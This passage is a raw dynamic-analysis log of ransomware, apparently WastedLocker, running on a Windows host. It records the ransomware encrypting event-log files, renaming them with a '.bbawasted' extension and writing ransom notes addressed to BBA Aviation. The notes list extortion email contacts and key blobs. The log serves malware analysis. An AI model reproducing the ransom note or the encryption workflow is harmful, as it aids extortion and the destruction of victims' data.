KEY:\r\n[begin_key]NhRckmF7MpGpWZxgnM+ZHaePVbqoAadQt7huQ7TCEmy7zRPhHOEVkQzqVlB/AS8j\r\nCsUNC6aoDCijbRaGNGLzG7GoVPSAJx9K79e5p1rhV/V45MhIZJq6AU1LSbUE4mHl\r\nlNqpDCgr4bNlvBz/y9xAcv5rryc/g0WacYCqRO05iQlFfeJeOn/Q58WwZKFeWF4o\r\nPGRORn1E4+HzxkJ+BXsTxtObtnulE7yPqVQvekjBCF1jU8jL0zDMBzUIN7tFBAZ6\r\nndJVUG0Pm5KGOkUHTFCU0HsCeYgTgUiAiBO+MCVv0Z2v1uE09h3rXS4RAL/7xcqo\r\nOOfFDa3yGHS2paOW2cA3aKCKK9JF+Sa1CL+AvGUqGQOKNX5FFRA8zOkdl7myJoq6\r\nZEszyb0Ja44RDdgsop32jz81gohqwTTYwDUnFfjVfZEUl++TLnZFZPth1xIDt+KD\r\nJa+Prv6UNWxSddPc+wJZw3MSc7tTpLhrm797b9JreI9gM7ulR6ISmAwfZEwDdtW5\r\nwtL3WjndL6tvcYY3u048hNN+7UsIWMuwOkHBUD/85RkjwujR2VM0KzSqGZoBZKLG\r\nQ0Mhq8Fr8jr6Shcp89la8294F3cwkAR4q+LLz/V4bJ0X+bbUnKC4pn1l+/sls1aP\r\nzER9r+3G8Izzm72ifH9KYZ5htGdX931ZUD6JTzb/BKX=[end_key]\r\nKEEP IT\r\n") returned 984 [0199.574] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0199.574] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0199.574] SetEndOfFile (hFile=0x28c) returned 1 [0199.577] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0199.577] CloseHandle (hObject=0x28c) returned 1 [0199.660] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0199.660] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a02a8 | out: hHeap=0x660000) returned 1 [0199.661] _aulldvrm () returned 0x0 [0199.661] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6570) returned 1 [0199.661] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0199.662] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0199.662] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 56 [0199.662] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6aecf0 [0199.662] lstrcpyW (in: lpString1=0x6aed60, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0199.662] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0199.662] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6ce0) returned 1 [0199.663] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0199.663] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0199.663] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0199.750] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0199.751] SetEndOfFile (hFile=0x28c) returned 1 [0199.751] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.751] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0199.751] lstrcpyW (in: lpString1=0x6aed60, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0199.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx.bbawasted")) returned 1 [0199.752] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0199.753] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0199.753] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0199.753] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0199.753] CloseHandle (hObject=0x294) returned 1 [0199.758] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0199.759] CloseHandle (hObject=0x280) returned 1 [0199.759] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0199.759] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6b48) returned 1 [0199.760] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0199.760] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0199.760] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6240) returned 1 [0199.760] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0199.760] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0199.769] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0199.769] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0199.769] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0199.769] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]CQvnJTULxOwRu3WCieoQZqmrxRXpo4ZzKHIwXR36a25iOcprlDh7InLUCEZtPD6Z\r\n3bQOzm7PAERyNk2xX/nFiVZ5tc17+ToA/UffYSzaXc6r/WcFfjEq4TFwwpf73Cen\r\nvRFQ3hx1uSpmOW45uMmX8nK2rSA3EDCF3eKhzk2nXCysQ0U+ZKd0dQh9MjFXcvga\r\nf7mzSlxoZehNu/tOd8sNiXcAeIyD+hLrQxKD0GQC6aS+kxottdwK8p5z7JpDT/hU\r\nySw/2Xr1ZPHV8xk4T1BqwaKn8fqHSt62AFgr6rF/4dFFB7SWT5tmLwikGNfMx+em\r\n2Wa+Ue6VPojW0+fLP4/XLgCzrIrKZAAV92BfozrfsGTccFzKr7XQPNDBhDT/hSXt\r\nu11jyJlsjvDTv8pKthIBh8eA+Kkc9cINxY+yX2kIJ0KAtxeVupdQpBHygTsJb1Og\r\nLvs9rNTU4HTlINVcU7AC+Bt1LTgw6GpSNtBq40P0L8TqTnRCLsunBqECv/DCb8HF\r\nI5XYznx2bg1tRdLjA0xDcNSfUOLy5exysvUyirMF6PxRt8wJprGs2QAf0RHEtQLJ\r\nnIh4CtvXdIAKAQQECXN3JT984TP9W2w7JUAd/rxD4EtfrEkSSTQJAHOsjjTccP5q\r\nevx2DXIpGYnkj8FD1AZOjwNwSXuNfREt17K8x2+Zfwe=[end_key]\r\nKEEP IT\r\n") returned 984 [0199.769] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0199.770] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0199.770] SetEndOfFile (hFile=0x28c) returned 1 [0199.772] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0199.772] CloseHandle (hObject=0x28c) returned 1 [0199.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0199.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa168 | out: hHeap=0x660000) returned 1 [0199.776] _aulldvrm () returned 0x0 [0199.776] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a68a0) returned 1 [0199.777] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0199.777] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0199.777] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 60 [0199.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x282) returned 0x6aecf0 [0199.777] lstrcpyW (in: lpString1=0x6aed68, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0199.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0199.777] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a64e8) returned 1 [0199.778] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0199.778] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0199.778] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0199.779] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0199.780] SetEndOfFile (hFile=0x28c) returned 1 [0199.780] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0199.781] lstrcpyW (in: lpString1=0x6aed68, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0199.781] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx.bbawasted")) returned 1 [0199.782] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0199.782] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0199.782] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x101000 [0199.782] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x101000) returned 0x41a0000 [0199.782] CloseHandle (hObject=0x280) returned 1 [0200.189] UnmapViewOfFile (lpBaseAddress=0x41a0000) returned 1 [0200.202] CloseHandle (hObject=0x294) returned 1 [0200.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0200.202] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a65f8) returned 1 [0200.203] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0200.203] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0200.203] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6ac0) returned 1 [0200.204] CryptGenRandom (in: hProv=0x6a6ac0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0200.204] CryptReleaseContext (hProv=0x6a6ac0, dwFlags=0x0) returned 1 [0200.367] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0200.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0200.368] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0200.368] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]o3igGWPWtFauvOstvLBlxSh40qDVtqTvuIQvPUjf+KozhVET6wxPhhA0hcikNoIp\r\nR0Ffmsibfnz80+FEoOS9zTRactAA8JDVyByTepzVhhIF4Y20i6sVY6YOCMMsU6nc\r\nNNZSUHUXilkfm2xDdQgAlgcbEBXa1NWjs91UlEVC4bVCq37iL3Nv4EZ10DE2NpL8\r\naqSh1RBTrmYB7TFwMJ/1HecWKlCL73uVtR9zOSdHwiiQTNScKD1F+8Ny2wo1tDNo\r\nWVHO8U13SkGWSLyVJF0gQD0ZvovLwFbegD5dTwTNIGiQe3myZocd+1lURsrd8khZ\r\n2n0eGkNeAOTpaYr33qzA1x3/rj7TntoP/lHB/lk+4VRrlHIiM2E1KKw5eR5Fbtab\r\nTuE/iNahWDxtFNs+Nd2BAum3gYR5Da+9/M7DK4U/9eyOsoaXOkuQZldSYfHGZL2V\r\nMvEqFLX9E8KqZoFirZsE9OP0ADKMBDckFRfjWF+5XCPfR4iYccOFyj4W8rIb/23F\r\nhevmq1XST9lqUZ+VSBVIx6nCd4pIRJFEp6XSGiAh7TGy7BHSeG50RruzaWlIsWoA\r\nomB/TGD7x0bTUbpGY8eTvjZczRBsDABzL3FOveQOXOXsVb1zBJyXlIOy1Zw/Gn1H\r\np2YSzkKnchJ/cEF84l21kuM3wjkGmH5TXidO17Uc5cs=[end_key]\r\nKEEP IT\r\n") returned 984 [0200.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0200.368] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0200.368] SetEndOfFile (hFile=0x28c) returned 1 [0200.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0200.372] CloseHandle (hObject=0x28c) returned 1 [0200.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0200.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a7918 | out: hHeap=0x660000) returned 1 [0200.377] _aulldvrm () returned 0x0 [0200.377] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a68a0) returned 1 [0200.378] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0200.378] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0200.378] lstrlenW (lpString="\\\\?\\C:\\Logs\\Security.evtx") returned 25 [0200.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x23c) returned 0x6ae598 [0200.378] lstrcpyW (in: lpString1=0x6ae5ca, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0200.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0200.378] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6b48) returned 1 [0200.379] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0200.379] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0200.379] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Security.evtx.bbawasted_info" (normalized: "c:\\logs\\security.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0200.380] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0200.381] SetEndOfFile (hFile=0x28c) returned 1 [0200.382] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0200.382] lstrcpyW (in: lpString1=0x6ae5ca, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0200.382] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Security.evtx.bbawasted" (normalized: "c:\\logs\\security.evtx.bbawasted")) returned 1 [0200.383] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Security.evtx.bbawasted" (normalized: "c:\\logs\\security.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0200.383] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0200.383] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x111000 [0200.383] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x111000) returned 0x41a0000 [0200.383] CloseHandle (hObject=0x294) returned 1 [0200.640] UnmapViewOfFile (lpBaseAddress=0x41a0000) returned 1 [0200.654] CloseHandle (hObject=0x280) returned 1 [0200.654] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0200.654] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6350) returned 1 [0200.655] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0200.655] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0200.655] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6240) returned 1 [0200.656] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0200.656] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0200.808] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0200.808] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0200.808] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0200.808] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]WxTayeaZnQylWKKr5baFPsh2VZT/MPiJ8etzrTH9faFaYtPcH52iYBeygMyPEOoG\r\n6EJgKTWdnQ8dxLuEbHdWmXtdtOQb3UGCghBvUS35aqZ7RIXeEN6a8mOV6seIQ1at\r\nD8t3uBYjvz+DeJGRyvGj6kC3g3XXD1+Th4RfcvcMlRTuC7Wc5kl48S414QT184sf\r\nf5LZ/zEoKbR1xt+aBxAakMQLJjYSg/TLbTUSWOvDYc3LOb7cVWROiGY9VP1+Zudq\r\n/U78P55n9I+hDf4WXxVTfJOwjWx1iKIdrhIHMJG38MzdiDgzqCBEG5a8Hy2F3frP\r\nDuuOHrr8j4B4Doy1C1UwIdcFAsiOGg6ix/UN7cG+HuZBS1wFEIp6kJTjM078nKG6\r\n3oEzzGGmhc6M/gKeXJnldX1cEU7g7e3owlB7mEefTIr33wAEqGHGHMr6dhlO1IvR\r\noM/auBPa8kbuMblkjRYnE/FarhyavTxi0gRbQfFGFuIC6CGTCyzyZ0iFzgYW6YHh\r\nFCw7tlDbk0K9/ECcbeqRwlNchh8itDK+yACqyZb+k2xb+jsSmBhMjNT/KLRH8lEG\r\nlZ29IzFHBZSSp66DKR76CVzynwWDaRxSDVYUKjiWuSHRqzB2kUpF6w94/Ln/wnd2\r\nXFPhqSeZUsQXgerqDCTS3Dzxlfq2laVXG2QqS4De1Q3=[end_key]\r\nKEEP IT\r\n") returned 984 [0200.808] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0200.808] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0200.809] SetEndOfFile (hFile=0x28c) returned 1 [0200.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0200.812] CloseHandle (hObject=0x28c) returned 1 [0200.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0200.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0390 | out: hHeap=0x660000) returned 1 [0200.817] _aulldvrm () returned 0x0 [0200.817] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6240) returned 1 [0200.818] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0200.818] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0200.818] lstrlenW (lpString="\\\\?\\C:\\Logs\\Setup.evtx") returned 22 [0200.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x236) returned 0x6ae598 [0200.818] lstrcpyW (in: lpString1=0x6ae5c4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0200.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0200.818] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6350) returned 1 [0200.819] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: 